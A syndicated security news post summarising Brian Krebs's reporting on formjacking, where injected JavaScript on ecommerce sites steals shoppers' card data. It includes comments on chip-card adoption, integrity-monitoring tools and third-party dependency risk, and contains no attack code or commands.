Ecommerce “Formjacking” is Attackers New Kind of Card Skimming


With the explosion of ecommerce in the last several years, attackers see an attractive, and unguarded, frontier to steal consumer information.

DevOps Connect:DevSecOps @ RSAC 2022

Source: Krebs on Security

The details: Security researcher Brian Krebs details a prevalent kind of hack targeted at ecommerce sites with the intent of stealing shopper data through online forms, including credit and debit card numbers. Krebs was able to identify legitimate ecommerce sites that have been infected with malicious code, most often Javascript, which redirects shoppers to malicious copycat sites which are then able to steal the users information.

Known as “formjacking,” this kind of hacking is on the rise as ecommerce becomes more prevalent and physical credit and debit card fraud becomes more difficult to achieve with the introduction of chip-based cards in the United States. Attackers often obfuscate their code on infected sites with custom a HTML function—window.atob—which, “scrambles the code referencing those domains names on hacked sites.”

Symantec says that it has blocked almost a quarter of a million instance of form jacking since August of this year.

Why it matters: Krebs notes that formjacking is akin to the digital equivalent of traditional card skimming techniques which placed physical devices in public ATMs and gas pumps:

“I like the comparison to skimming because online merchants are being targeted in major way right now precisely because of efforts to make it hard for thieves to make money from fraud involving counterfeit debit and credit cards. The United States is the last of the G20 nations to make the transition to more secure chip-based payment cards, and virtually every other country that has already been through that shift has seen a marked increase in online fraud as a result.”

Many ecommerce sites are run in a pseudo-professional fashion with website administrators who do not know how to identify malicious code on their own sites. For admins who need assistance, Krebs suggests tools to help monitor a site for unauthorized changes such as Tripwire and AIDE or subscription services “” and “”

The hacker perspective:

Eric “McGyver” McIntyre, director of research and development at Randori, says:

“When you visit a website—even if that site is served via TLS (i.e. you access it via an HTTPS URL)—you are trusting that site, and everything that site trusts. Either by a cross-domain reference, as Krebs is discussing or, increasingly by the developers of the site directly relying on third-party dependencies they have neither the time nor the resources to review (Node packages, for example). Every additional domain reference or third-party package is a risk multiplier. These days there isn’t a good way for most people to quantify the risk posed by any particular page.”

*** This is a Security Bloggers Network syndicated blog from Code Red authored by Dan Rowinski. Read the original post at: